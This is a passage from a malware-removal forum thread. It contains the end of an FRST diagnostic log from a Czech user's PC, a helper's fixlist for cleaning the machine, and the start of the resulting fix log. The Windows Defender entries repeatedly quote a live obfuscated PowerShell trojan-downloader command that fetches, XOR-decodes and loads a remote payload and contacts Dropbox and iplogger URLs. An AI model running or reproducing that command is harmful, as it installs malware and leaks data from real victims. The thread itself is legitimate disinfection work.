FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

13-01-2021 21:32:33 Instalační služba modulů systému Windows

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============
Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


Windows Defender:
===================================
Date: 2021-01-20 19:28:36.8570000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2538.0, AS: 1.329.2538.0, NIS: 1.329.2538.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 90%
Total physical RAM: 3767.05 MB
Available physical RAM: 356.34 MB
Total Virtual: 7351.05 MB
Available Virtual: 3556.64 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.19 GB) (Free:62.69 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32

\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 3 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)

==================== End of Addition.txt =======================

Re: Please check my log

Posted: 20 Jan 2021 20:05
by Rudy
Open Notepad and copy the following into it:
Start

CloseProcesses:
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
C:\WINDOWS\AutoKMS

EmptyTemp:
Hosts:
End
Save it to the desktop as fixlist.txt. Run FRST again and click >Fix<. When the run finishes, a log will appear; copy it here.

Re: Please check my log

Posted: 20 Jan 2021 20:21
by chenny
Fix result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 20:16:06) Run:1
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
